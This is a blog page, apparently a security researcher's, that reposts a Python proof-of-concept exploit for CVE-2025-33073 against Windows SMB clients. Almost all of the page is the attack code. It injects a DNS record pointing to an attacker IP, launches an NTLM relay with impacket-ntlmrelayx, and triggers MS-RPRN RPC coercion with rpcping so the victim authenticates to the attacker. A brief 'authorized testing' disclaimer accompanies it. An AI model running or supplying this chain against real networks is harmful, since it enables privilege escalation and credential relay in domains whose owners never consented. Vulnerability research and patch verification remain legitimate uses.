Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

Latest Posts

Microsoft Windows 11 SMB Client Privilege Escalation / Remote Code Execution

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 16
#!/usr/bin/env python3
# Exploit Title: Windows 11 SMB Client - #!/usr/bin/env python3
# Exploit Title: Windows 11 SMB Client - Privilege Escalation & Remote Code Execution (RCE)
# Author: Mohammed Idrees Banyamer
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# Date: 2025-06-13
# Tested on: Windows 11 version 22H2, Windows Server 2022, Kali Linux 2024.2
# CVE: CVE-2025-33073
# Type: Remote
# Platform: Microsoft Windows (including Windows 10, Windows 11, Windows Server 2019/2022/2025)
# Attack Vector: Remote via DNS injection and RPC coercion with NTLM relay
# User Interaction: Required (authenticated domain user)
# Remediation Level: Official Fix Available
#
# Affected Versions:
# - Windows 11 versions 22H2, 22H3, 23H2, 24H2 (10.0.22621.x and 10.0.26100.x)
# - Windows Server 2022 (including 23H2 editions)
# - Windows Server 2019
# - Windows 10 versions from 1507 up to 22H2
# - Windows Server 2016 and 2008 (with appropriate versions)
#
# Description:
# This PoC demonstrates a complex attack chain exploiting improper access control in Windows SMB clients,
# leading to elevation of privilege through DNS record injection, NTLM relay attacks using impacket-ntlmrelayx,
# and coercion of a victim system (including Windows 11) to authenticate to an attacker-controlled server
# via MS-RPRN RPC calls. The exploit affects multiple Windows versions including Windows 11 (10.0.22621.x),
# Windows Server 2022, and earlier versions vulnerable to this method.
#
#
# Note: The exploit requires the victim to be an authenticated domain user and the environment
# must not have mitigations like SMB signing enforced or Extended Protection for Authentication (EPA).
#
# DISCLAIMER: For authorized security testing and educational use only.

import argparse
import subprocess
import socket
import time
import sys

def inject_dns_record(dns_ip, dc_fqdn, record_name, attacker_ip):
print("[*] Injecting DNS record via samba-tool (requires admin privileges)...")
cmd = [
"samba-tool", "dns", "add", dns_ip, dc_fqdn,
record_name, "A", attacker_ip, "--username=Administrator", "--password=YourPassword"
]
try:
subprocess.run(cmd, check=True)
print("[+] DNS record successfully added.")
except subprocess.CalledProcessError:
print("[!] Failed to add DNS record. Check credentials and connectivity.")
sys.exit(1)

def check_record(record_name):
print("[*] Verifying DNS record propagation...")
for i in range(10):
try:
result = socket.gethostbyname_ex(record_name)
if result and result[2]:
print(f"[+] DNS record resolved to: {result[2]}")
return True
except socket.gaierror:
time.sleep(2)
print("[!] DNS record did not propagate or resolve.")
return False

def start_ntlmrelay(target):
print("[*] Starting NTLM relay server (impacket-ntlmrelayx)...")
try:
subprocess.Popen([
"impacket-ntlmrelayx", "-t", target, "--no-smb-server"
])
print("[*] NTLM relay server started.")
except Exception as e:
print(f"[!] Failed to start NTLM relay server: {e}")
sys.exit(1)

def trigger_coercion(victim_ip, fake_host):
print("[*] Triggering victim to authenticate via MS-RPRN RPC coercion...")
cmd = [
"rpcping",
"-t", f"ncacn_np:{victim_ip}[\\pipe\\spoolss]",
"-s", fake_host,
"-e", "1234",
"-a", "n",
"-u", "none",
"-p", "none"
]
try:
subprocess.run(cmd, check=True)
print("[+] Coercion RPC call sent successfully.")
except subprocess.CalledProcessError:
print("[!] RPC coercion failed. Verify victim connectivity and service status.")
sys.exit(1)

def main():
parser = argparse.ArgumentParser(description="Windows 11 SMB Client Elevation of Privilege PoC using DNS Injection + NTLM Relay + RPC Coercion")
parser.add_argument("--attacker-ip", required=True, help="IP address of the attacker-controlled server")
parser.add_argument("--dns-ip", required=True, help="IP address of the DNS server (usually the DC)")
parser.add_argument("--dc-fqdn", required=True, help="Fully qualified domain name of the domain controller")
parser.add_argument("--target", required=True, help="Target system to relay authentication to")
parser.add_argument("--victim-ip", required=True, help="IP address of the victim system to coerce authentication from")
args = parser.parse_args()

record = "relaytrigger"
fqdn = f"{record}.{args.dc_fqdn}"

inject_dns_record(args.dns_ip, args.dc_fqdn, record, args.attacker_ip)
if not check_record(fqdn):
print("[!] DNS verification failed, aborting.")
sys.exit(1)

start_ntlmrelay(args.target)
time.sleep(5) # Wait for relay server to be ready

trigger_coercion(args.victim_ip, fqdn)

print("[*] Exploit chain triggered. Monitor ntlmrelayx output for authentication relays.")

if __name__ == "__main__":
main()
Social Media Share